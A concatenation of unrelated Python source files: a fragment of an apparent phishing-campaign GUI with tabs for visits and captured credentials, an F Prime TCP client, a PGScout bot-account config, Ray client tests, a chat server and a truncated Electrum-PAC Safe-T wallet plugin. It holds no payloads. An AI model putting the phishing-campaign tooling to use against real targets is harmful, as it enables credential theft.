""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = utilities.FreezableDict()
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(application)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(application)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(application)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(application)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
if self.config.get('gui.show_deaddrop', False):
deaddrop_connections_tab = CampaignViewDeaddropTab(application)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
self.tabs.freeze()
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab in self.tabs.values():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=False)
|
client_socket.py
|
# TODO documentation
from __future__ import print_function
import sys
import socket
import threading
import select
from fprime_gds.common.handlers import DataHandler
from fprime.constants import DATA_ENCODING
# Constants for public use
GUI_TAG = "GUI"
FSW_TAG = "FSW"
class ThreadedTCPSocketClient(DataHandler):
"""
Threaded TCP client that connects to the socket server that serves packets from the flight
software
"""
def __init__(self, sock=None, dest=FSW_TAG):
"""
Threaded client socket constructor
Keyword Arguments:
sock {Socket} -- A socket for the client to use. Created own if
None (default: {None})
"""
if sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
self.sock = sock
# NOTE can't do this b/c EINPROGRESS: self.sock.setblocking(0)
self.dest = dest
self.__distributors = []
self.__select_timeout = 1
self.__data_recv_thread = threading.Thread(target=self.recv)
self.stop_event = threading.Event()
def get_data_bytes(self, string_data):
"""
Convert the data bytes from string to bytes
:param string_data: data in string format
:return: data in bytes format
"""
if sys.version_info >= (3, 0):
return string_data.encode(DATA_ENCODING)
return string_data
def get_data_string(self, bytes_data):
"""
Convert the data bytes from string to bytes
:param bytes_data: data in bytes format
:return: data in string format
"""
if sys.version_info >= (3, 0):
return bytes_data.decode(DATA_ENCODING)
return bytes_data
def register_distributor(self, distributor):
"""Registers a fprime.gds.distributor object with this socket
Arguments:
fprime.gds.distributor {Distributor} -- Distributor must implement data_callback
"""
self.__distributors.append(distributor)
def register_to_server(self, register_as):
"""
Registers the caller to the server as type register_as
This function assumes the socket connects to an fprime TCP server
Args:
register_as (string): How to identify this process to the TCP server
Can be either "FSW" or "GUI"
"""
data = "Register %s\n" % register_as
self.sock.send(self.get_data_bytes(data))
def connect(self, host, port):
"""Connect to host at given port and start the threaded recv method.
Arguments:
host {string} -- IP of the host server
port {int} -- Port of the host server
"""
try:
self.sock.connect((host, port))
self.__data_recv_thread.start()
except OSError:
print("There was a problem connecting to the TCP Server")
exit(-1)
def disconnect(self):
"""Disconnect the socket client from the server and stop the internal thread.
"""
self.stop_event.set()
self.__data_recv_thread.join()
self.sock.close()
def data_callback(self, data, sender=None):
"""
Handles incoming data by sending it to a socket.
:param data: data to send to the client socket
:param sender: sender source of the data
"""
self.send(data, self.dest)
def send(self, data, dest):
"""
Send data to the server
All necessary headers are added in this function.
Arguments:
data {binary} -- The data to send (What you want the destination
to receive)
dest {String} -- Where to send the data to. Either "FSW" or "GUI"
"""
self.sock.send(b"A5A5 %s %s" % (self.get_data_bytes(dest), data))
def recv(self):
"""
Method run constantly by the enclosing thread. Looks for data from the server.
"""
while not self.stop_event.is_set():
ready = select.select([self.sock], [], [], self.__select_timeout)
if ready[0]:
chunk = self.sock.recv(1024)
for d in self.__distributors:
d.on_recv(chunk)
|
config.py
|
# Configuration with default values
import json
import logging
import os
import sys
from threading import Thread
import configargparse
import time
from mrmime import init_mr_mime
from mrmime.cyclicresourceprovider import CyclicResourceProvider
from pgscout.proxy import check_proxies
log = logging.getLogger(__name__)
args = None
def cfg_get(key, default=None):
global args
return getattr(args, key)
def cfg_set(key, value):
global args
setattr(args, key, value)
def parse_args():
global args
defaultconfigfiles = []
if '-c' not in sys.argv and '--config' not in sys.argv:
defaultconfigfiles = ['config.ini']
parser = configargparse.ArgParser(
default_config_files=defaultconfigfiles)
parser.add_argument('-c', '--config',
is_config_file=True, help='Specify configuration file.')
parser.add_argument('-hs', '--host', default='127.0.0.1',
help='Host or IP to bind to.')
parser.add_argument('-p', '--port', type=int, default=4242,
help='Port to bind to.')
parser.add_argument('-hk', '--hash-key', required=True, action='append',
help='Hash key(s) to use.')
parser.add_argument('-pf', '--proxies-file',
help='Load proxy list from text file (one proxy per line).')
parser.add_argument('-l', '--level', type=int, default=30,
help='Minimum trainer level required. Lower levels will yield an error.')
parser.add_argument('-pgpmult', '--pgpool-acct-multiplier', type=int, default=1,
help='Use each account fetched from PGPOOL this number of times')
parser.add_argument('-mqj', '--max-queued-jobs', type=int, default=0,
help='Maximum number of queued scout jobs before rejecting new jobs. 0 (default) means no restriction.')
parser.add_argument('-mjttl', '--max-job-ttl', type=int, default=0,
help='Maximum number of minutes a job is allowed to be queued before it expires (Time-To-Live). '
'Expired jobs will be rejected when it''s their turn. 0 (default) means no restriction.')
parser.add_argument('-sb', '--shadowban-threshold', type=int, default=5,
help='Mark an account as shadowbanned after this many errors. ' +
'If --pgpool_url is specified the account gets swapped out.')
parser.add_argument('-iv', '--initial-view', default="logs",
help=('Initial view. Can be one of "logs", "scouts" or "pokemon". Default is "logs".'))
parser.add_argument('-pgpu', '--pgpool-url',
help='Address of PGPool to load accounts from and/or update their details.')
parser.add_argument('-pgpsid', '--pgpool-system-id',
help='System ID for PGPool. Required if --pgpool-url given.')
parser.add_argument('-lpf', '--low-prio-file',
help='File with Pokemon names or IDs that will be treated with low priority or even dropped.')
parser.add_argument('-ct', '--cache-timer', type=int, default=60,
help='Minutes of caching to perform (default 60)')
accs = parser.add_mutually_exclusive_group(required=True)
accs.add_argument('-pgpn', '--pgpool-num-accounts', type=int, default=0,
help='Use this many accounts from PGPool. --pgpool-url required.')
accs.add_argument('-a', '--accounts-file',
help='Load accounts from CSV file containing "auth_service,username,passwd" lines.')
args = parser.parse_args()
def init_resoures_from_file(resource_file):
resources = []
if resource_file:
try:
with open(resource_file) as f:
for line in f:
# Ignore blank lines and comment lines.
if len(line.strip()) == 0 or line.startswith('#'):
continue
resources.append(line.strip())
except IOError:
log.exception('Could not load {} from {}.'.format(resource_file))
exit(1)
return resources
def get_pokemon_name(pokemon_id):
if not hasattr(get_pokemon_name, 'pokemon'):
file_path = os.path.join('pokemon.json')
with open(file_path, 'r') as f:
get_pokemon_name.pokemon = json.loads(f.read())
return get_pokemon_name.pokemon[str(pokemon_id)]
def get_pokemon_id(pokemon_name):
if not hasattr(get_pokemon_id, 'ids'):
if not hasattr(get_pokemon_name, 'pokemon'):
# initialize from file
get_pokemon_name(1)
get_pokemon_id.ids = {}
for pokemon_id, name in get_pokemon_name.pokemon.iteritems():
get_pokemon_id.ids[name] = int(pokemon_id)
return get_pokemon_id.ids.get(pokemon_name, -1)
def read_pokemon_ids_from_file(f):
pokemon_ids = set()
for name in f:
name = name.strip()
# Lines starting with # mean: skip this line
if name[0] in ('#'):
continue
try:
# Pokemon can be given as Pokedex ID
pid = int(name)
except ValueError:
# Perform the usual name -> ID lookup
pid = get_pokemon_id(unicode(name, 'utf-8'))
if pid and not pid == -1:
pokemon_ids.add(pid)
return sorted(pokemon_ids)
def cfg_init():
log.info("Loading PGScout configuration...")
parse_args()
# MrMime config
mrmime_cfg = {
'pgpool_system_id': args.pgpool_system_id,
'exception_on_captcha': True
}
if args.pgpool_acct_multiplier > 1:
mrmime_cfg.update ({
'request_retry_delay': 1,
'full_login_flow': False,
'scan_delay' : 5
})
if args.pgpool_url:
mrmime_cfg['pgpool_url'] = args.pgpool_url
log.info("Attaching to PGPool at {}".format(args.pgpool_url))
init_mr_mime(mrmime_cfg)
# Collect hash keys
args.hash_key_provider = CyclicResourceProvider()
for hk in args.hash_key:
args.hash_key_provider.add_resource(hk)
# Collect proxies
args.proxies = check_proxies(cfg_get('proxies_file'))
args.proxy_provider = CyclicResourceProvider()
for proxy in args.proxies:
args.proxy_provider.add_resource(proxy)
args.low_prio_pokemon = []
if args.low_prio_file:
with open(args.low_prio_file) as f:
args.low_prio_pokemon = read_pokemon_ids_from_file(f)
if args.low_prio_pokemon:
log.info("{} low priority Pokemon loaded from {}".format(len(args.low_prio_pokemon), args.low_prio_file))
t = Thread(target=watch_low_prio_file, args=(args.low_prio_file,))
t.daemon = True
t.start()
def watch_low_prio_file(filename):
statbuf = os.stat(filename)
watch_low_prio_file.tstamp = statbuf.st_mtime
while True:
statbuf = os.stat(filename)
current_mtime = statbuf.st_mtime
if current_mtime != watch_low_prio_file.tstamp:
with open(filename) as f:
cfg_set('low_prio_pokemon', read_pokemon_ids_from_file(f))
log.info("File {} changed on disk. Re-read.".format(filename))
watch_low_prio_file.tstamp = current_mtime
time.sleep(5)
def use_pgpool():
return bool(args.pgpool_url and args.pgpool_system_id and args.pgpool_num_accounts > 0)
|
test_client.py
|
import pytest
import time
import sys
import logging
import threading
import _thread
import ray.util.client.server.server as ray_client_server
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import ray_start_client_server
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_interrupt_ray_get(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
time.sleep(1)
return "ok"
class Interrupt(threading.Thread):
def run(self):
time.sleep(2)
_thread.interrupt_main()
it = Interrupt()
it.start()
with pytest.raises(KeyboardInterrupt):
ray.get(block.remote())
# Assert we can still get new items after the interrupt.
assert ray.get(fast.remote()) == "ok"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or \
(ready, remaining) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) \
or (ready_retval, remaining_retval) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef(b"blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return ("Hello " + whom, self.count)
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
s, count = ray.get(actor.say_hello.remote("world"))
assert s == "Hello world"
assert count == 2
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact,
10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(actor_handle.exec_exec.remote(second_actor, fact,
9)) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj,
4)) == local_fact(4)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
# Allow some time to propogate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2
assert any((msg.find("get") >= 0 for msg in logs_with_id))
assert any((msg.find("put") >= 0 for msg in logs_with_id))
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
assert len(log_msgs) == 2
assert all((msg.find("Hello world") for msg in log_msgs))
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_serializing_exceptions(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(ValueError):
ray.get_actor("abc")
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor.
"""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(
name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
detatched_actor = ray.get_actor("test_acc2")
for i in range(5):
detatched_actor.inc.remote()
assert ray.get(detatched_actor.get.remote()) == 6
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") == b""
def test_startup_retry(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
with pytest.raises(ConnectionError):
ray_client.connect("localhost:50051", connection_retries=1)
def run_client():
ray_client.connect("localhost:50051")
ray_client.disconnect()
thread = threading.Thread(target=run_client, daemon=True)
thread.start()
time.sleep(3)
server = ray_client_server.serve("localhost:50051")
thread.join()
server.stop(0)
ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
@ray_client.remote
def f(x):
time.sleep(4)
return x
def stop_server(server):
time.sleep(2)
server.stop(0)
server = ray_client_server.serve("localhost:50051")
ray_client.connect("localhost:50051")
thread = threading.Thread(target=stop_server, args=(server, ))
thread.start()
x = f.remote(2)
with pytest.raises(ConnectionError):
_ = ray_client.get(x)
thread.join()
ray_client.disconnect()
ray_client._inside_client_test = False
# Wait for f(x) to finish before ray.shutdown() in the fixture
time.sleep(3)
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
server_gui.py
|
import socket
from threading import Thread
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the cave! Now type your name and press enter!", "utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client): # Takes client socket as argument.
"""Handles a single client connection."""
name = client.recv(BUFSIZ).decode("utf8")
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
client.send(bytes(welcome, "utf8"))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg, "utf8"))
clients[client] = name
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket.socket() # these options break mac (AF_INET, SOCK_STREAM)
SERVER.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
SERVER.bind(ADDR)
if __name__ == "__main__":
# setting up the connection
SERVER.listen(5)
print("Hostname", socket.gethostname())
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
# closing out server
SERVER.close()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_pac.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_pac.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_pac import constants
from electrum_pac.i18n import _
from electrum_pac.plugin import BasePlugin, Device
from electrum_pac.transaction import deserialize, Transaction
from electrum_pac.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_pac.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'Safe-T mini', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "PacTestnet" if constants.net.TESTNET else "Pac"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
